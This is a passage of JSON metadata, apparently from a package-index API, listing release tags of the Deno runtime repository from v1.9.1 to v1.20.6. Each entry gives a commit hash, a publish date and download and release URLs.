":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9